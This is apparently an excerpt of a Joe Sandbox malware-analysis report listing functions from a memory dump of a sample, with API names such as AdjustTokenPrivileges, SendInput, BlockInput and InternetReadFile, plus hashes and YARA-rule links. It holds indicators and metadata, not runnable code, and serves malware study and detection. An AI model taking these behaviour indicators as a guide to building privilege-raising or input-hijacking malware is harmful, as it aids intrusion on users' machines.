                                                                                • Opcode ID: 4319a682b676806559ada1e1e2a537e8d5e8e6a4cd1916f84ce5e893799bb061
                                                                                • Instruction ID: ba943dc3715f33d24d4bb338ae09a4c43048345b06daebf77e53c3c3dabdf5f4
                                                                                • Opcode Fuzzy Hash: 4319a682b676806559ada1e1e2a537e8d5e8e6a4cd1916f84ce5e893799bb061
                                                                                • Instruction Fuzzy Hash: A4D1E832B196C687D7B4DF25E184AAAF7A1FB88784F949134CB4E53B44DA3CE851DB00
                                                                                Function 00007FF79F8DD5CC Relevance: 4.6, APIs: 3, Instructions: 59COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustConcurrency::cancel_current_taskErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                • String ID:
                                                                                • API String ID: 2278415577-0
                                                                                • Opcode ID: 70c4773b18923e0c28b697d59e2b6e62826da89e857526a178f76e4b759ffcd8
                                                                                • Instruction ID: 27159c1b344b8e58f5deb0e0dce140e51d62c07d81ba7b5ac8f3acae309c6c9e
                                                                                • Opcode Fuzzy Hash: 70c4773b18923e0c28b697d59e2b6e62826da89e857526a178f76e4b759ffcd8
                                                                                • Instruction Fuzzy Hash: 8D219D72A08A8185D724AF26E4446A9B7A0FB88B94F848435DA4D47718CF78D5A5C750
                                                                                Function 00007FF79F8DD540 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                • String ID:
                                                                                • API String ID: 3429775523-0
                                                                                • Opcode ID: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                                • Instruction ID: 1e4c4f4ea8ccbfb6d112ad555233886f3ab292c60821c1801942e78b384e09aa
                                                                                • Opcode Fuzzy Hash: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                                • Instruction Fuzzy Hash: FC012D736246818FE7209F30D8553E973A0F75476EF410929E64D86A98CB7DC158CF84
                                                                                Function 00007FF79F8B2F50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .
                                                                                • API String ID: 0-248832578
                                                                                • Opcode ID: 704ebd355b677e1258a9e20fb2f824619711b00144154a2c45bc08c04a856543
                                                                                • Instruction ID: be9940d977bc00dae6c8d78043d768f393ab148f7f97017aaf84a4eadfe40519
                                                                                • Opcode Fuzzy Hash: 704ebd355b677e1258a9e20fb2f824619711b00144154a2c45bc08c04a856543
                                                                                • Instruction Fuzzy Hash: 24315B12B146D144EBB0BF72A804AF6E690FB50BE5F848631EE6D07BC4DE3CD4269710
                                                                                Function 00007FF79F8ABEF8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF79F8A475C,?,?,00000000,00007FF79F8A47D9,?,?,?,?,?,00007FF79F8F2210), ref: 00007FF79F8ABF3F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Time$FileSystem
                                                                                • String ID: GetSystemTimePreciseAsFileTime
                                                                                • API String ID: 2086374402-595813830
                                                                                • Opcode ID: 572b71549e45f6bab70ab7a1e99299a405b58e83dcd9cf08a8343814aa6f0cc3
                                                                                • Instruction ID: bd8927787c9aa92ed4817c9ab713250c634151f527b8e377c03b53a68a17931f
                                                                                • Opcode Fuzzy Hash: 572b71549e45f6bab70ab7a1e99299a405b58e83dcd9cf08a8343814aa6f0cc3
                                                                                • Instruction Fuzzy Hash: C3F03020A5E6C791EA64BB71B8444F4A310AF487E0FC95035D90E46759EE3CE455D720
                                                                                Function 00007FF79F8B67F0 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionRaise_clrfp
                                                                                • String ID:
                                                                                • API String ID: 15204871-0
                                                                                • Opcode ID: 2c887139cc1f69395780bda7c312862f1bbc48349006177215bd8e385e5acab5
                                                                                • Instruction ID: d00065decfc1f25fcce108bec7ea3d41240085287b90068d5e50e4b3ecc08db9
                                                                                • Opcode Fuzzy Hash: 2c887139cc1f69395780bda7c312862f1bbc48349006177215bd8e385e5acab5
                                                                                • Instruction Fuzzy Hash: 15B17BB3A00B858BEB65DF39C8467ACBBA0F744B4CF588861DA5D837A4CB39D461C710
                                                                                Function 00007FF79F8FE968 Relevance: 3.1, APIs: 2, Instructions: 97networkfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$AvailableDataFileQueryRead
                                                                                • String ID:
                                                                                • API String ID: 599397726-0
                                                                                • Opcode ID: a54c6d4a74e6411871131af3bdbcf589181ad988d0891215d2ce77e29c03cb3f
                                                                                • Instruction ID: ff7a7e402459d362e315abc8a13983e51b4375a9d1b5f28560902b9df2ea4d1e
                                                                                • Opcode Fuzzy Hash: a54c6d4a74e6411871131af3bdbcf589181ad988d0891215d2ce77e29c03cb3f
                                                                                • Instruction Fuzzy Hash: B331D432B04A4289FBA8EE36D452BFCA391FB98B98F504435DE0D47B98DE38D4519350
                                                                                Function 00007FF79F8F71F4 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Find$CloseFileFirst
                                                                                • String ID:
                                                                                • API String ID: 2295610775-0
                                                                                • Opcode ID: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
                                                                                • Instruction ID: d5a8ce071d2a9b777e317031801c38df604642b56fd4b49ca39d8691c76006db
                                                                                • Opcode Fuzzy Hash: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
                                                                                • Instruction Fuzzy Hash: 81117C32B0878186EB20EB26E4847ACB760FB88BA0F558631DA6D47B95CF7CD4618750
                                                                                Function 00007FF79F8F3778 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFormatLastMessage
                                                                                • String ID:
                                                                                • API String ID: 3479602957-0
                                                                                • Opcode ID: a2008fc71fb315c0dad007a4b51d1fe3c27baf42b183b088b3737ee8cb1df6e2
                                                                                • Instruction ID: 4af449cf3eceffa7c3b6f65ef7d56aab7d3677de69b0e2c0c213e8d1504964ef
                                                                                • Opcode Fuzzy Hash: a2008fc71fb315c0dad007a4b51d1fe3c27baf42b183b088b3737ee8cb1df6e2
                                                                                • Instruction Fuzzy Hash: CDF0C871A1868245E7706B35F8057AAE3A5FFC9794F914134EB9D43BA9DF3CC0148B10
                                                                                Function 00007FF79F8DCCE0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                • String ID:
                                                                                • API String ID: 81990902-0
                                                                                • Opcode ID: 2696843c0c1c48d019296e0beaf727179f08331fefa667d0a626b5bdda81ebd6
                                                                                • Instruction ID: 2b5ed7db606c4f493797ef55b7db4bfe12af62341a64913505da5e5788c11616
                                                                                • Opcode Fuzzy Hash: 2696843c0c1c48d019296e0beaf727179f08331fefa667d0a626b5bdda81ebd6
                                                                                • Instruction Fuzzy Hash: 90F0A0A6A14A8182EB70EB31D8157F89360FB98BA8F604532CE0D4A258CE3CD0969220
                                                                                Function 00007FF79F8A95B0 Relevance: 2.9, Strings: 2, Instructions: 378COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: a/p$am/pm
                                                                                • API String ID: 0-3206640213
                                                                                • Opcode ID: 7b3f4c1adbce48e9712f7f101c5ec161db5e41a840f2bf09c06579e081aceba8
                                                                                • Instruction ID: ca52e21ec4a4af7ac52294f5ff4a1b594fee464752ab0d3acf396e6ce1f2f5f8
                                                                                • Opcode Fuzzy Hash: 7b3f4c1adbce48e9712f7f101c5ec161db5e41a840f2bf09c06579e081aceba8
                                                                                • Instruction Fuzzy Hash: 00E19622A0E69285EFB4AF3481459FDB3A5FF01780FD55932DA1D46684EF3DE960E320
                                                                                Function 00007FF79F880E70 Relevance: 1.9, Strings: 1, Instructions: 680COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Variable is not of type 'Object'.
                                                                                • API String ID: 0-1840281001
                                                                                • Opcode ID: 085062051d8c6d05dddc6329c8930327e2f409664b9aa2ab8e8b8fd8cd37859f
                                                                                • Instruction ID: 186bcd14845e15c8e1131f3d003f21d697916e3d619100b59a4b596119428982
                                                                                • Opcode Fuzzy Hash: 085062051d8c6d05dddc6329c8930327e2f409664b9aa2ab8e8b8fd8cd37859f
                                                                                • Instruction Fuzzy Hash: 8D525336A08BC29AEBB0EF71D040AFCA765EB45788F904031DE1D57A85DF38E565E360
                                                                                Function 00007FF79F88FA4F Relevance: 1.7, Strings: 1, Instructions: 447COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: no error
                                                                                • API String ID: 0-1106124726
                                                                                • Opcode ID: daf22cd7e491b1831c7a4d7ece73bd53412841c2595e7b00d29937dbea50e64a
                                                                                • Instruction ID: ad43f545bf515631d8b4aedecf9e7732bec65956f9096d59463e798864c58a44
                                                                                • Opcode Fuzzy Hash: daf22cd7e491b1831c7a4d7ece73bd53412841c2595e7b00d29937dbea50e64a
                                                                                • Instruction Fuzzy Hash: 8312BC72A187918AE774DF31D440AFDB3A0FB44748B904136EB9E47B94DB38E960E760
                                                                                Function 00007FF79F8E9420 Relevance: 1.5, APIs: 1, Instructions: 26keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: InputSend
                                                                                • String ID:
                                                                                • API String ID: 3431551938-0
                                                                                • Opcode ID: f56fcc02370cedd2e246ff2304cc88798786294839e2fbad01620a5262f8ee40
                                                                                • Instruction ID: b90814e8d5cf8e4f64bfff9f24e053302e918263b49ea1d26e56f34878124eda
                                                                                • Opcode Fuzzy Hash: f56fcc02370cedd2e246ff2304cc88798786294839e2fbad01620a5262f8ee40
                                                                                • Instruction Fuzzy Hash: 33F0BEA691C6C0C6D3309F25E4407AAB7A0F7587ADF806119EB8947B64CB3EC10ADF04
                                                                                Function 00007FF79F8ED1A4 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: mouse_event
                                                                                • String ID:
                                                                                • API String ID: 2434400541-0
                                                                                • Opcode ID: d8d6f02688d8abf5cd4837f0aea5b825f774ed0048ed251121670875c750f025
                                                                                • Instruction ID: e5b3696acc939a55bd343df301095c602466eed7ac5a107cd220f287f95ca929
                                                                                • Opcode Fuzzy Hash: d8d6f02688d8abf5cd4837f0aea5b825f774ed0048ed251121670875c750f025
                                                                                • Instruction Fuzzy Hash: 84E01277E0C1C352F6BC3938551ABF5C641AB91300ED40135DB4946AD4CD6D952AB528
                                                                                Function 00007FF79F900A00 Relevance: 1.5, APIs: 1, Instructions: 23keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: BlockInput
                                                                                • String ID:
                                                                                • API String ID: 3456056419-0
                                                                                • Opcode ID: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
                                                                                • Instruction ID: 89d00d7ba31c81737e9151a86f0231304a11a98ea51795b6ed12e9d4a52d7b57
                                                                                • Opcode Fuzzy Hash: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
                                                                                • Instruction Fuzzy Hash: B1E02B3271428286EB94AF36E0442BDE3A0EF84B94F544030DE1DC3355DE7CC4908300
                                                                                Function 00007FF79F8D2BCF Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: NameUser
                                                                                • String ID:
                                                                                • API String ID: 2645101109-0
                                                                                • Opcode ID: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
                                                                                • Instruction ID: 28682fd4eeb656a5764abedec92a47b171c352f39bb84e89f471c8487cb3f837
                                                                                • Opcode Fuzzy Hash: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
                                                                                • Instruction Fuzzy Hash: B3C0C9616156929AE770EF20D8845EC2330F700318FC00022E60A4E46C9F788248C300
                                                                                Function 00007FF79F89BEB4 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: 0
                                                                                • API String ID: 3215553584-4108050209
                                                                                • Opcode ID: 1b448239c859d57582f3fa817e0dbfe1db0dd889c5120d72b994c6c156eeceba
                                                                                • Instruction ID: d3bef320d9a04c733f8484a68eda6773d4586928ec70111b86a4a04145664f24
                                                                                • Opcode Fuzzy Hash: 1b448239c859d57582f3fa817e0dbfe1db0dd889c5120d72b994c6c156eeceba
                                                                                • Instruction Fuzzy Hash: D4710411B0C2C346EBF8AA354444AFDE7949F42B48F940535DD08876D5CF2EF9E5AB21
                                                                                Function 00007FF79F8AA8A0 Relevance: 1.4, Strings: 1, Instructions: 139COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
